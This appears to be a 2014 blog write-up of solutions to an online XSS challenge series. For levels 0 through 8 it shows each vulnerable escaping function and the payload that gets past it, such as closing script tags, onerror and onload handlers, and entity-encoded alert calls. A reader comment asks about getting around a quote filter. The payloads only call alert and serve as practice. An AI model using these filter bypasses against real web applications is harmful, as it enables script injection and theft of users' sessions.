Saturday, 26 April 2014

XSS Chalenges





Hello friends, Just Wanna Share Some of My solutions for XSS CHALENGES BY Erling and i Hope You'll Try to Solve Them By YourSelf Too .

Okay Lets start .

Level 0


 function escape(s) {
  // Warmup.

  return '<script>console.log("'+s+'");</script>';
}

Here is no encoding So I'm just gonna Close log and Then Calling alert Function

Solution : ");alert(1)//

Level 1 

function escape(s) {
  // Escaping scheme courtesy of Adobe Systems, Inc.
  s = s.replace(/"/g, '\\"');
  return '<script>console.log("' + s + '");</script>';
}

Function is Escaping (") Quotes by Just adding Double slashes so If We Just add one More Slash then It will be bypassed :P

Solution: \");alert(1)//

Level 2

function escape(s) {
  s = JSON.stringify(s);
  return '<script>console.log(' + s + ');</script>';
}

JSON.stringify(s) is Just Converting (") Double Quotes into (\") , Hmmm But its Not Blocking (<>) Brackets , so We again Managed to Fool the function :P

Solution: </script><img src=x onerror=alert(1)//

Level 3 

function escape(s) {
  var url = 'javascript:console.log(' + JSON.stringify(s) + ')';
  console.log(url);

  var a = document.createElement('a');
  a.href = url;
  document.body.appendChild(a);
  a.click();
}

Again (")  is Being Filtered?? okay We Can Still Manage to Play With it :P Just convert (") to URL.Encoding.

Solution: %22);alert(1)//

 Level 4

function escape(s) {
  var text = s.replace(/</g, '&lt;').replace('"', '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}

Now Intresting Part is Here :D (>) is Being Replaced with (&lt) and (") with (&quot) so What to do Now?? Hey Here Just A combination of (") is Being Replaced so what If We Call Just an Event Handler to Popup The Alert1) ?? Lets Try it

Solution: [[a|""src=x onerror="alert(1)]]

Level 5 

function escape(s) {
  // Level 4 had a typo, thanks Alok.
  // If your solution for 4 still works here, you can go back and get more points on level 4 now.

  var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}

 Now We are Just Going to Use Any src Tag which will Execute The Query whereas the URL Will be Simply replaced by Second Action.

solution: [[a|http://onload='alert(1)']]

Level 6 

function escape(s) {
  // Slightly too lazy to make two input fields.
  // Pass in something like "TextNode#foo"
  var m = s.split(/#/);

  // Only slightly contrived at this point.
  var a = document.createElement('div');
  a.appendChild(document['create'+m[0]].apply(document, m.slice(1)));
  return a.innerHTML;
}

Okay Guyz Here comes the Intresting Stuff , its Not Even filtering anything just Using a CreatComment Element so we Can Write any thing:  Like Comment#><JS Alert Function Here>

Solution:  Comment#><img src=x onerror=alert(1)//

Level 7 

function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1] };
  var json = JSON.stringify(obj).replace(/</g, '\\u003c');
  return "<script>" + thing[0] + "(" + json +")</script>";
}

Ahaan Here we are just going to Enclose the JSON function and # in Sungle String and Then Injecting our Payload

Solution: '#';alert(1)//

Level 8

function escape(s) {
  // Courtesy of Skandiabanken
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}


and Here I Cannot See Any escaping function so Im Just closing the script tag and Injecting With No alpha Character Because it Converting My Payloads to Upper Case.

Solution: </script><svg onload=&#97&#108&#101&#114&#116(1)//


I Hope you'll Like It :D

XSS Chalenges bypass

  • Uploaded by: Unknown
  • Views:
  • Share

    1 comments:

    1. i have the same issue with one xss filter, when I use " it replaces with &quote; what can I do ?

      ReplyDelete

     
    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity